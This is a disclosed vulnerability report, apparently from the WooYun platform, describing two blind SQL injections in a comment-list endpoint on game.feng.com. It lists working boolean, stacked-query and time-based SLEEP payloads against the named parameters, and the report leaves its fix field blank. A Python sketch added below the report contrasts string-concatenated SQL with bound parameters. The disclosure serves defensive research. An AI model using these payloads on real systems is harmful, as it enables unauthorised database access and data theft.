Vulnerability Summary
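Title: Two MySQL blind SQL injections on a 威锋网 site
Submitted: 2015-09-11 15:40
Fixed: 2015-10-26 16:50
Published: 2015-10-26 16:50
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 12
Status: Confirmed by vendor
Tags: None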
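Vulnerability Details
Disclosure status:
2015-09-11: Details sent to the vendor, awaiting vendor handling
2015-09-11: Vendor confirmed; details disclosed to the vendor only
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to trainee white hats
2015-10-26: Details disclosed to the public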
Brief description: soil...
Detailed description:
http://game.feng.com/gamenew/fengComment/getCommentListSecond.shtml
post data:
comment_id=270176&comment_type=article&modelId=89487&page=1
payload:
comment_id=270176 and length(database())=2&comment_type=article&modelId=89487&page=1
comment_id=270176 and length(database())=3&comment_type=article&modelId=89487&page=1
Proof of vulnerability:
---
Parameter: comment_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: comment_id=270176 AND 7432=7432&comment_type=article&modelId=89487&page=1

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: comment_id=270176;SELECT SLEEP(5)#&comment_type=article&modelId=89487&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: comment_id=270176 AND SLEEP(5)&comment_type=article&modelId=89487&page=1

Parameter: modelId (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: comment_id=270176&comment_type=article&modelId=89487 AND 4448=4448&page=1

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: comment_id=270176&comment_type=article&modelId=89487;SELECT SLEEP(5)#&page=1

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: comment_id=270176&comment_type=article&modelId=89487 AND SLEEP(5)&page=1
---
back-end DBMS: MySQL 5.1
current user: '[email protected] .%.%'
current db: 'we+'
Fix:
Copyright notice: please credit the source when reposting. 紫霞仙子 @乌云
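
The report leaves the fix blank. The following is an added example, not part of the original report and not the vendor's code, showing why the numeric `comment_id` and `modelId` fields give a boolean oracle when concatenated into SQL, and how strict integer parsing plus bound parameters closes it. SQLite stands in for MySQL, and the table, column and function names are hypothetical.

```python
import sqlite3

def make_db():
    """Constructed sample data; schema is hypothetical, SQLite stands in for MySQL."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments "
               "(id INTEGER, parent_id INTEGER, model_id INTEGER, body TEXT)")
    db.executemany("INSERT INTO comments VALUES (?, ?, ?, ?)", [
        (1, 270176, 89487, "first reply"),
        (2, 270176, 89487, "second reply"),
        (3, 111, 222, "other thread"),
    ])
    return db

def list_replies_concat(db, comment_id, model_id):
    """Pattern consistent with the report: raw POST fields pasted into the SQL text."""
    sql = ("SELECT body FROM comments WHERE parent_id = " + comment_id +
           " AND model_id = " + model_id + " ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def parse_id(raw):
    """Accept only a plain ASCII decimal ID; everything else is rejected before SQL."""
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 18):
        raise ValueError("invalid numeric id")
    return int(raw)

def list_replies_bound(db, comment_id, model_id):
    """Hardened form: validated integers passed as bound parameters, never as SQL text."""
    sql = ("SELECT body FROM comments WHERE parent_id = ? AND model_id = ? "
           "ORDER BY id")
    params = (parse_id(comment_id), parse_id(model_id))
    return [row[0] for row in db.execute(sql, params)]

if __name__ == "__main__":
    db = make_db()
    # The page's boolean payload leaves the result unchanged; a false
    # condition (constructed counterpart) empties it. That difference is the oracle.
    print(list_replies_concat(db, "270176 AND 7432=7432", "89487"))
    print(list_replies_concat(db, "270176 AND 7432=7433", "89487"))
    try:
        list_replies_bound(db, "270176 AND 7432=7432", "89487")
    except ValueError as exc:
        print("rejected:", exc)
```
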
Vulnerability Response
Vendor response:
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-11 16:49
Vendor reply: Thanks, fix in progress
Latest status: None yet